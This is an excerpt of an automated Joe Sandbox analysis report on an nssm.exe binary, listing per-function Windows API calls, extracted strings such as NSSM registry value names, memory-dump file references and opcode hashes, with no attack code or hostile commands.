                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD018632B1578085EE61BF67A945399B7A0E78CFC0F4C4822FB4A4B765EE39C9918740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: GetUserDefaultLCID.KERNELBASE(?,?,?,?,?,?,00000000,000000014000723E,?,?,?,00000000,0000000140001065), ref: 00000001400070A8
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: FormatMessageW.KERNELBASE ref: 00000001400070D7
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: FormatMessageW.KERNEL32 ref: 0000000140007109
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: GetProcessHeap.KERNEL32 ref: 0000000140007113
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: HeapAlloc.KERNEL32 ref: 0000000140007122
                                                                                                                                                                                                                                    • Part of subcall function 00000001400070A0: _snwprintf_s.LIBCMT ref: 0000000140007144
                                                                                                                                                                                                                                  • _vfwprintf_p.LIBCMT ref: 0000000140007251
                                                                                                                                                                                                                                  • LocalFree.KERNELBASE(?,?,?,00000000,0000000140001065), ref: 0000000140007259
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatHeapMessage$AllocDefaultFreeLocalProcessUser_snwprintf_s_vfwprintf_p
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 418798648-0
                                                                                                                                                                                                                                  • Opcode ID: 320812ef4a6b29ab813f6a0650b779e902f789cc5c787088916a8942450009b1
                                                                                                                                                                                                                                  • Instruction ID: 735b025534d33ac62484ac2c71ad82d6e12bc40ca507ecf350a79a27edab1414
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320812ef4a6b29ab813f6a0650b779e902f789cc5c787088916a8942450009b1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE0DFB1A05B8082D90ADB1779447A9A2A1ABDC7C0F484828BF4C0776AEF3CC5508740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$CreateInformation
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1774340351-0
                                                                                                                                                                                                                                  • Opcode ID: 96b588388f8e4a7e34088d5f4c107f05b0f5098a338c89fb0b18c1a37fad8485
                                                                                                                                                                                                                                  • Instruction ID: c450e2850d08cd6503a534310d28961aa8a718141b75b40d29b1337d64fcaa7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b588388f8e4a7e34088d5f4c107f05b0f5098a338c89fb0b18c1a37fad8485
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E04FB5A2178082F78A9B22A8557956290FB8C780F80542DBF49037A4DF3CC5558A00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0000000140018CC3
                                                                                                                                                                                                                                    • Part of subcall function 000000014001DA14: _FF_MSGBANNER.LIBCMT ref: 000000014001DA44
                                                                                                                                                                                                                                    • Part of subcall function 000000014001DA14: HeapAlloc.KERNEL32(?,?,00000000,0000000140018CC8,?,?,00000000,0000000140019259,?,?,00000000,0000000140019303), ref: 000000014001DA69
                                                                                                                                                                                                                                    • Part of subcall function 000000014001DA14: _errno.LIBCMT ref: 000000014001DA8D
                                                                                                                                                                                                                                    • Part of subcall function 000000014001DA14: _errno.LIBCMT ref: 000000014001DA98
                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,00000000,0000000140019259,?,?,00000000,0000000140019303,?,?,?,?,?,?,00000000,000000014001AFD8), ref: 0000000140018CDA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$AllocHeapSleepmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 496785850-0
                                                                                                                                                                                                                                  • Opcode ID: 204786af87f5b40f774933f9522a6a27231c47b56917b909924df4b0f49afbfa
                                                                                                                                                                                                                                  • Instruction ID: 4a154d0ba2ab264bccb9e2be0d431b52e3d7ad6d9af87eb784b6fb61d423a232
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 204786af87f5b40f774933f9522a6a27231c47b56917b909924df4b0f49afbfa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0F63221578486EA129F17A44039EB361E78CBD0F484125FF6D07B64CF39CD918B40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: c61ec4b0ce0004456c3788e4063bf9cf411fdebbdd489666a7512683e92290ac
                                                                                                                                                                                                                                  • Instruction ID: 917c567ccea4d017a661501f885a2874b473daba0d10e99762426e768a55d36b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c61ec4b0ce0004456c3788e4063bf9cf411fdebbdd489666a7512683e92290ac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05E0E631640A0092EDB6976BD9583B02154A74EBB4F940359B33B039F14F7C4C968601
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _flush
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1054455859-0
                                                                                                                                                                                                                                  • Opcode ID: 6e0ed5a3834567e1ae60938876126abc310a3db2c259f8644c3a2edb2020079f
                                                                                                                                                                                                                                  • Instruction ID: 29f4252d2e86d44e0df6393545d43eeb3f15e1c2b6180872cb631ce1dfe8b97b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e0ed5a3834567e1ae60938876126abc310a3db2c259f8644c3a2edb2020079f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E012F3E1160487EB1D4A6290493B832A1E37CB9BF154518EB510D196D778C5958784
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Free$Process$ErrorLastOpenService$ChangeCloseConfigHandleLocalManager_vfwprintf_p
                                                                                                                                                                                                                                  • String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
                                                                                                                                                                                                                                  • API String ID: 717911963-3133791794
                                                                                                                                                                                                                                  • Opcode ID: c330124e382e8227fad00427f013d9fb1446286123777014898e5c54e3521bc2
                                                                                                                                                                                                                                  • Instruction ID: fd8f4f6ac2d6c76c90547cf1791d46ade8aaf582ed5f9fbc6967ba2985fa83a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c330124e382e8227fad00427f013d9fb1446286123777014898e5c54e3521bc2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96E1C171604B5592FB22EBA3A8443DA63A0FB8DBD8F444119FB8A0B7B5DF79C945C301
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000003,00000000,00000000,00000003,?,00000001400117BC), ref: 000000014000F26E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppNoConsole$AppParameters$AppPriority$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$Application$NSSM
                                                                                                                                                                                                                                  • API String ID: 3535843008-3183881257
                                                                                                                                                                                                                                  • Opcode ID: 80114bc7676e02abbb4ad2d85e60963a14e9d1c419e75d6b5e4ca5a4215c78de
                                                                                                                                                                                                                                  • Instruction ID: 505b35bbd023730a7198f3cc76143fe39539e9a2a99905a82e22de49a8ac41d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80114bc7676e02abbb4ad2d85e60963a14e9d1c419e75d6b5e4ca5a4215c78de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63129FF2204A86A6E726DF62B4407DA7760F74C7C8F84411AFB8D43A65DB3CD558D700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: canon$dependencies$native_set_dependongroup
                                                                                                                                                                                                                                  • API String ID: 0-1240925597
                                                                                                                                                                                                                                  • Opcode ID: 6c4df088fbf530d0b5e6b42ecaac3250e102b89580fe2b8bdd55a03b5a0b85ed
                                                                                                                                                                                                                                  • Instruction ID: 9ee6628e5a49a9d8dd224bb87cfd19c65224fa3640ab0878e8b777e05c072a95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c4df088fbf530d0b5e6b42ecaac3250e102b89580fe2b8bdd55a03b5a0b85ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EC17D35604B8092EB11EBA7B4043DA63A1FB8DBD5F544529BB494BBB4DF39C845C740
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: N$ N$"%s" %s$%lu$NSSM$command line$h$start_service
                                                                                                                                                                                                                                  • API String ID: 0-3347312365
                                                                                                                                                                                                                                  • Opcode ID: 85e81faf70f98e483bb37361cbf89bfa7c94796de7ea10c01b027d566e1ba94d
                                                                                                                                                                                                                                  • Instruction ID: 5609c352706ea33facc6d903f8290feb490ebf9d6cfae838dcfb56a15ea8c7f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85e81faf70f98e483bb37361cbf89bfa7c94796de7ea10c01b027d566e1ba94d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD1D0B2604A84E6E72ADB62E1413DEB3A1F38C384F404226FB9E476A5DF7DC564C750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHandle$CloseInformationMoveTextUnicode
                                                                                                                                                                                                                                  • String ID: MoveFile()
                                                                                                                                                                                                                                  • API String ID: 2866973295-3582319293
                                                                                                                                                                                                                                  • Opcode ID: 31257b2c2e44df666fef524038048a7e63d094ede9762ce3ad2c69525899f004
                                                                                                                                                                                                                                  • Instruction ID: 8007bd27142a99f4d56dc294e59fb463678843993da6925152b7f311443bb51a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31257b2c2e44df666fef524038048a7e63d094ede9762ce3ad2c69525899f004
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BD128B6204B8586EB21DF66F4407AA73A5F78DBD8F504029EB8947B68DF3DC944CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$ErrorLast$Process$FreeService$EnumNameServicesStatus$AllocDisplayOpen_snwprintf_s
                                                                                                                                                                                                                                  • String ID: ENUM_SERVICE_STATUS$canonical_name$open_service()
                                                                                                                                                                                                                                  • API String ID: 2015548786-3687008758
                                                                                                                                                                                                                                  • Opcode ID: 1f9de5683489d1b9dd409bcdd46613d87ca3edc280a03da2028b12002fc77140
                                                                                                                                                                                                                                  • Instruction ID: 6581955321cb146b22ead78443b17c9b5f21664f3382f7c962a5e6721c3fd79f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9de5683489d1b9dd409bcdd46613d87ca3edc280a03da2028b12002fc77140
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7816E31605A4196EB12ABA2F8443DAB7A0F78DBD8F504525FB8A47B75DF3DC845C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FEB5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FED1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FEF9
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF02
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF18
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF21
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF37
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF40
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF5E
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF67
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FF99
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 000000014001FFA8
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 0000000140020000
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 0000000140020020
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000000,000000014001C9B0,?,?,?,?,?,000000014001CA44), ref: 0000000140020039
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                                                                  • API String ID: 3085332118-232180764
                                                                                                                                                                                                                                  • Opcode ID: 6806e7b39d816853c1e8f953c0f1786895bd98a14998461afd98a6d5fbde5bd9
                                                                                                                                                                                                                                  • Instruction ID: fe8e7f3d1c32ff68c888a24664af46db1eb1d97fa76070e7ec7d0c666bf4e9c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6806e7b39d816853c1e8f953c0f1786895bd98a14998461afd98a6d5fbde5bd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C851C435202B4590FD57EB53B8543E56390AB8EBD0F880529BE494B7B6EF7DC9429200
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocFree$FileLocalModuleName_vfwprintf_p
                                                                                                                                                                                                                                  • String ID: "$GetCommandLine()$GetModuleFileName()$elevate()$p$runas
                                                                                                                                                                                                                                  • API String ID: 814701388-2244849910
                                                                                                                                                                                                                                  • Opcode ID: 26acb1a94d9127769705756c716ae58eb8742148e60497e417c22ae1acee6054
                                                                                                                                                                                                                                  • Instruction ID: 9c92aca42038ab37a36f24885236932d3a653bc0b2b4c741fd9a03d8bb9050c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26acb1a94d9127769705756c716ae58eb8742148e60497e417c22ae1acee6054
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F516D71615A4192E752ABA2E8007EA63A1FB89BD4F804639FB5E437B9DF3DC8458700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseEventHandle_snwprintf_s$NextProcessProcess32Source$CodeCreateDeregisterExitOpenRegisterReportSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID: %lu$AppStopMethodSkip$NSSM
                                                                                                                                                                                                                                  • API String ID: 3754905935-153837258
                                                                                                                                                                                                                                  • Opcode ID: 5e5fd9fd3b9477e97e92a9928799ebd951e88df2b222c88293a04ff657d57fed
                                                                                                                                                                                                                                  • Instruction ID: 3669881dbe72548c747d7c2419818e18ffca1d7d98eb5d24680956ebd739734e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e5fd9fd3b9477e97e92a9928799ebd951e88df2b222c88293a04ff657d57fed
